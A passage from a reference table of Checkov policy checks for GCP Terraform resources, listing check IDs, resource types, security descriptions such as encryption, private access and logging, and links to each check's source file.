[ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py) | -| 1692 | CKV_GCP_85 | resource | google_bigtable_instance | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py) | -| 1693 | CKV_GCP_86 | resource | google_cloudbuild_worker_pool | Ensure Cloud build workers are private | Terraform | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py) | -| 1694 | CKV_GCP_87 | resource | google_data_fusion_instance | Ensure Data fusion instances are private | Terraform | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py) | -| 1695 | CKV_GCP_88 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted mysql access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py) | -| 1696 | CKV_GCP_89 | resource | google_notebooks_instance | Ensure Vertex AI instances are private | Terraform | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py) | -| 1697 | CKV_GCP_90 | resource | google_dataflow_job | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py) | -| 1698 | CKV_GCP_91 | resource | google_dataproc_cluster | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py) | -| 1699 | CKV_GCP_92 | resource | google_vertex_ai_dataset | Ensure Vertex AI datasets uses a CMK (Customer Managed Key) | Terraform | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py) | -| 1700 | CKV_GCP_93 | resource | google_spanner_database | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py) | -| 1701 | CKV_GCP_94 | resource | google_dataflow_job | Ensure Dataflow jobs are private | Terraform | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py) | -| 1702 | CKV_GCP_95 | resource | google_redis_instance | Ensure Memorystore for Redis has AUTH enabled | Terraform | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py) | -| 1703 | CKV_GCP_96 | resource | google_vertex_ai_metadata_store | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key) | Terraform | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py) | -| 1704 | CKV_GCP_97 | resource | google_redis_instance | Ensure Memorystore for Redis uses intransit encryption | Terraform | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py) | -| 1705 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_binding | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | -| 1706 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_member | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | -| 1707 | CKV_GCP_99 | resource | google_pubsub_topic_iam_binding | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | -| 1708 | CKV_GCP_99 | resource | google_pubsub_topic_iam_member | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | -| 1709 | CKV_GCP_100 | resource | google_bigquery_table_iam_binding | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | -| 1710 | CKV_GCP_100 | resource | google_bigquery_table_iam_member | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | -| 1711 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_binding | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | -| 1712 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_member | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | -| 1713 | CKV_GCP_102 | resource | google_cloud_run_service_iam_binding | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | -| 1714 | CKV_GCP_102 | resource | google_cloud_run_service_iam_member | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | -| 1715 | CKV_GCP_103 | resource | google_dataproc_cluster | Ensure Dataproc Clusters do not have public IPs | Terraform | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py) | -| 1716 | CKV_GCP_104 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver logging enabled | Terraform | [DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py) | -| 1717 | CKV_GCP_105 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver monitoring enabled | Terraform | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py) | -| 1718 | CKV_GCP_106 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access | Terraform | [GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py) | -| 1719 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 1720 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 1721 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 1722 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 1723 | CKV_GCP_108 | resource | google_sql_database_instance | Ensure hostnames are logged for GCP PostgreSQL databases | Terraform | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py) | -| 1724 | CKV_GCP_109 | resource | google_sql_database_instance | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower | Terraform | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py) | -| 1725 | CKV_GCP_110 | resource | google_sql_database_instance | Ensure pgAudit is enabled for your GCP PostgreSQL database | Terraform | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py) | -| 1726 | CKV_GCP_111 | resource | google_sql_database_instance | Ensure GCP PostgreSQL logs SQL statements | Terraform | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py) | -| 1727 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_binding | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 1728 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_member | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 1729 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_policy | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 1730 | CKV_GCP_113 | data | google_iam_policy | Ensure IAM policy should not define public access | Terraform | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py) | -| 1731 | CKV_GCP_114 | resource | google_storage_bucket | Ensure public access prevention is enforced on Cloud Storage bucket | Terraform | [GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py) | -| 1732 | CKV_GCP_115 | resource | google_organization_iam_binding | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | -| 1733 | CKV_GCP_115 | resource | google_organization_iam_member | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | -| 1734 | CKV_GCP_116 | resource | google_folder_iam_binding | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | -| 1735 | CKV_GCP_116 | resource | google_folder_iam_member | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | -| 1736 | CKV_GCP_117 | resource | google_project_iam_binding | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | -| 1737 | CKV_GCP_117 | resource | google_project_iam_member | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | -| 1738 | CKV_GCP_118 | resource | google_iam_workload_identity_pool_provider | Ensure IAM workload identity pool provider is restricted | Terraform | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py) | -| 1739 | CKV_GCP_119 | resource | google_spanner_database | Ensure Spanner Database has deletion protection enabled | Terraform | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py) | -| 1740 | CKV_GCP_120 | resource | google_spanner_database | Ensure Spanner Database has drop protection enabled | Terraform | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py) | -| 1741 | CKV_GCP_121 | resource | google_bigquery_table | Ensure BigQuery tables have deletion protection enabled | Terraform | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py) | -| 1742 | CKV_GCP_122 | resource | google_bigtable_instance | Ensure Big Table Instances have deletion protection enabled | Terraform | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py) | -| 1743 | CKV_GCP_123 | resource | google_container_cluster | GKE Don't Use NodePools in the Cluster configuration | Terraform | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py) | -| 1744 | CKV_GCP_124 | resource | google_cloudfunctions2_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) | -| 1745 | CKV_GCP_124 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) | -| 1746 | CKV2_GCP_1 | resource | google_project_default_service_accounts | Ensure GKE clusters are not running using the Compute Engine default service account | Terraform | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml) | -| 1747 | CKV2_GCP_2 | resource | google_compute_network | Ensure legacy networks do not exist for a project | Terraform | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml) | -| 1748 | CKV2_GCP_3 | resource | google_service_account_key | Ensure that there are only GCP-managed service account keys for each service account | Terraform | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml) | -| 1749 | CKV2_GCP_4 | resource | google_logging_folder_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 1750 | CKV2_GCP_4 | resource | google_logging_organization_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 1751 | CKV2_GCP_4 | resource | google_logging_project_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 1752 | CKV2_GCP_4 | resource | google_storage_bucket | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 1753 | CKV2_GCP_5 | resource | google_project | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | -| 1754 | CKV2_GCP_5 | resource | google_project_iam_audit_config | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | -| 1755 | CKV2_GCP_6 | resource | google_kms_crypto_key | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 1756 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_binding | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 1757 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_member | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 1758 | CKV2_GCP_7 | resource | google_sql_database_instance | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | -| 1759 | CKV2_GCP_7 | resource | google_sql_user | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | -| 1760 | CKV2_GCP_8 | resource | google_kms_key_ring | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 1761 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_binding | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 1762 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_member | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 1763 | CKV2_GCP_9 | resource | google_container_registry | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 1764 | CKV2_GCP_9 | resource | google_storage_bucket_iam_binding | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 1765 | CKV2_GCP_9 | resource | google_storage_bucket_iam_member | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 1766 | CKV2_GCP_10 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function HTTP trigger is secured | Terraform | [CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml) | -| 1767 | CKV2_GCP_11 | resource | google_project_services | Ensure GCP GCR Container Vulnerability Scanning is enabled | Terraform | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml) | -| 1768 | CKV2_GCP_12 | resource | google_compute_firewall | Ensure GCP compute firewall ingress does not allow unrestricted access to all ports | Terraform | [GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml) | -| 1769 | CKV2_GCP_13 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_duration' is set to 'on' | Terraform | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml) | -| 1770 | CKV2_GCP_14 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml) | -| 1771 | CKV2_GCP_15 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml) | -| 1772 | CKV2_GCP_16 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml) | -| 1773 | CKV2_GCP_17 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml) | -| 1774 | CKV2_GCP_18 | resource | google_compute_network | Ensure GCP network defines a firewall and does not use the default firewall | Terraform | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml) | -| 1775 | CKV2_GCP_19 | resource | google_container_cluster | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled | Terraform | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml) | -| 1776 | CKV2_GCP_20 | resource | google_sql_database_instance | Ensure MySQL DB instance has point-in-time recovery backup configured | Terraform | [GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml) | -| 1777 | CKV2_GCP_21 | resource | google_notebooks_instance | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml) | -| 1778 | CKV2_GCP_22 | resource | google_document_ai_processor | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml) | -| 1779 | CKV2_GCP_23 | resource | google_document_ai_warehouse_location | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml) | -| 1780 | CKV2_GCP_24 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml) | -| 1781 | CKV2_GCP_25 | resource | google_vertex_ai_featurestore | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml) | -| 1782 | CKV2_GCP_26 | resource | google_vertex_ai_tensorboard | Ensure Vertex AI tensorboard uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml) | -| 1783 | CKV2_GCP_27 | resource | google_workbench_instance | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml) | -| 1784 | CKV2_GCP_28 | resource | google_workbench_instance | Ensure Vertex AI workbench instances are private | Terraform | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml) | -| 1785 | CKV2_GCP_29 | resource | google_dialogflow_agent | Ensure logging is enabled for Dialogflow agents | Terraform | [GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml) | -| 1786 | CKV2_GCP_30 | resource | google_dialogflow_cx_agent | Ensure logging is enabled for Dialogflow CX agents | Terraform | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml) | -| 1787 | CKV2_GCP_31 | resource | google_dialogflow_cx_webhook | Ensure logging is enabled for Dialogflow CX webhooks | Terraform | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml) | -| 1788 | CKV2_GCP_32 | resource | google_tpu_v2_vm | Ensure TPU v2 is private | Terraform | 